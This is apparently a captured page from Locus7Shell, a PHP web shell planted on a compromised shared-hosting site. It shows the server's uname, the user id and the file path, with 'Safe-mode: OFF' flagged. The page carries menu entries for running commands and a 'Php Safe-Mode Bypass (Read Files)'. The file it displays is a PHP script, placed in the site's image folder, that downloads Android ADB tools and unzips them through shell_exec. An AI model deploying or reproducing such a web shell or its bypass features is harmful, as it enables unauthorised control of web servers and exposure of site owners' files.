![]() | |
---|---|
Software: Apache. PHP/5.4.45 uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue uid=243112(mycochar) gid=100(users) groups=100(users) Safe-mode: OFF (not secure) /home/mycochar/www/image/photo/adb/ drwxr-xr-x |
Viewing file: Select action/file-type:
<?php function downloadADB() { $os = PHP_OS; if ($os === 'Windows') { $url = "https://dl.google.com/android/repository/platform-tools-latest-windows.zip"; } elseif ($os === 'Linux') { $url = "https://dl.google.com/android/repository/platform-tools-latest-linux.zip"; } elseif ($os === 'Darwin') { $url = "https://dl.google.com/android/repository/platform-tools-latest-darwin.zip"; } else { /*die("Unsupported OS");*/ echo $os; } $filename = "platform-tools.zip"; file_put_contents($filename, file_get_contents($url)); shell_exec("unzip $filename -d ./platform-tools"); } if (!file_exists('./platform-tools/adb')) { downloadADB(); }
|
Useful Commands
|
Php Safe-Mode Bypass (Read Files)
|
--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0052 ]-- |